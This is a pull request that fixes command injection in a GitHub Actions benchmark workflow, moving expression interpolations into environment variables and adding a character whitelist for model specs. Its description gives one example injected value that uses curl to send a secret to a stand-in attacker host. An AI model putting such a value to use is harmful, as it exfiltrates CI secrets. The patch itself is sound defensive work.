### PR TITLE
fix(harbor): prevent command injection in workflow run blocks

### DIFF
--- a/.github/scripts/models.py
+++ b/.github/scripts/models.py
@@ -15,8 +15,16 @@ from __future__ import annotations
 
 import json
 import os
+import re
 import sys
 from typing import NamedTuple
+
+_SAFE_SPEC_RE = re.compile(r"^[a-zA-Z0-9:_\-./]+$")
+"""Allowed characters in model specs: alphanumeric, colon, hyphen, underscore,
+dot, slash.
+
+Rejects shell metacharacters ($, `, ;, |, &, (, ), etc.).
+"""
 
 
 class Model(NamedTuple):
@@ -174,9 +182,7 @@ def _filter_by_tag(prefix: str, tag: str | None) -> list[str]:
     """Return model specs matching a tag filter, in REGISTRY order."""
     if tag is not None:
         return [m.spec for m in REGISTRY if tag in m.groups]
-    return [
-        m.spec for m in REGISTRY if any(g.startswith(prefix) for g in m.groups)
-    ]
+    return [m.spec for m in REGISTRY if any(g.startswith(prefix) for g in m.groups)]
 
 
 def _resolve_models(workflow: str, selection: str) -> list[str]:
@@ -205,6 +211,10 @@ def _resolve_models(workflow: str, selection: str) -> list[str]:
     invalid = [s for s in specs if ":" not in s]
     if invalid:
         msg = f"Invalid model spec(s) (expected 'provider:model'): {', '.join(repr(s) for s in invalid)}"
+        raise ValueError(msg)
+    unsafe = [s for s in specs if not _SAFE_SPEC_RE.match(s)]
+    if unsafe:
+        msg = f"Model spec(s) contain disallowed characters: {', '.join(repr(s) for s in unsafe)}"
         raise ValueError(msg)
     return specs
 

--- a/.github/workflows/harbor.yml
+++ b/.github/workflows/harbor.yml
@@ -112,6 +112,7 @@ jobs:
       DAYTONA_API_KEY: ${{ secrets.DAYTONA_API_KEY }}
       HARBOR_TASK_COUNT: ${{ inputs.task_count }}
       HARBOR_SANDBOX_ENV: ${{ inputs.sandbox_env }}
+      HARBOR_MODEL: ${{ matrix.model }}
     steps:
       - name: "📋 Checkout Code"
         uses: actions/checkout@v6
@@ -141,7 +142,7 @@ jobs:
             -n "$HARBOR_TASK_COUNT" \
             --jobs-dir jobs/terminal-bench \
             --env "$HARBOR_SANDBOX_ENV" \
-            --model "${{ matrix.model }}" \
+            --model "$HARBOR_MODEL" \
             --agent-kwarg use_cli_agent=false
 
       - name: "🔍 Find latest Harbor job"
@@ -161,24 +162,31 @@ jobs:
 
       - name: "⭐ Add Harbor rewards to LangSmith"
         if: always() && steps.latest-job.outcome == 'success' && steps.langsmith.outcome == 'success'
+        env:
+          HARBOR_JOB_DIR: ${{ steps.latest-job.outputs.job_dir }}
+          LANGSMITH_EXPERIMENT_NAME: ${{ steps.langsmith.outputs.experiment_name }}
         run: |
           uv run python scripts/harbor_langsmith.py add-feedback \
-            "${{ steps.latest-job.outputs.job_dir }}" \
-            --project-name "${{ steps.langsmith.outputs.experiment_name }}"
+            "$HARBOR_JOB_DIR" \
+            --project-name "$LANGSMITH_EXPERIMENT_NAME"
 
       - name: "📝 Write workflow summary"
         if: always()
+        env:
+          HARBOR_JOB_DIR: ${{ steps.latest-job.outputs.job_dir }}
+          LANGSMITH_EXPERIMENT_NAME: ${{ steps.langsmith.outputs.experiment_name }}
+          LATEST_JOB_OUTCOME: ${{ steps.latest-job.outcome }}
         run: |
           {
             echo "## Harbor run"
             echo
-            echo "- Model: ${{ matrix.model }}"
+            echo "- Model: $HARBOR_MODEL"
             echo "- Dataset: ${HARBOR_DATASET_NAME}@${HARBOR_DATASET_VERSION}"
             echo "- Sandbox: ${HARBOR_SANDBOX_ENV}"
             echo "- Task count: ${HARBOR_TASK_COUNT}"
-            echo "- LangSmith experiment: ${{ steps.langsmith.outputs.experiment_name }}"
-            if [ "${{ steps.latest-job.outcome }}" = "success" ]; then
-              echo "- Harbor job dir: ${{ steps.latest-job.outputs.job_dir }}"
+            echo "- LangSmith experiment: $LANGSMITH_EXPERIMENT_NAME"
+            if [ "$LATEST_JOB_OUTCOME" = "success" ]; then
+              echo "- Harbor job dir: $HARBOR_JOB_DIR"
             fi
           } >> "$GITHUB_STEP_SUMMARY"
 


### PR DESCRIPTION
Fix command injection in the harbor workflow. The `models_override` free-text input flows through `models.py` into `matrix.model`, which was interpolated directly into `run:` blocks via `${{ }}` — inside double quotes, bash still executes `$(...)` command substitution. A compromised collaborator PAT could exfiltrate secrets (`ANTHROPIC_API_KEY`, `OPENAI_API_KEY`, etc.) by crafting a model spec like `provider:$(curl attacker.com?k=$SECRET)`.

## Changes
- Replace all `${{ matrix.model }}`, `${{ steps.*.outputs.* }}`, and `${{ steps.*.outcome }}` interpolations inside `run:` blocks in `harbor.yml` with env var references (`$HARBOR_MODEL`, `$HARBOR_JOB_DIR`, `$LANGSMITH_EXPERIMENT_NAME`, `$LATEST_JOB_OUTCOME`). Values are assigned via step/job-level `env:` which sets them in the process environment without shell parsing.
- Add `_SAFE_SPEC_RE` character whitelist (`^[a-zA-Z0-9:_\-./]+$`) in `_resolve_models` to reject free-text model specs containing shell metacharacters (`$`, `` ` ``, `;`, `|`, `&`, etc.) before they reach the matrix output.
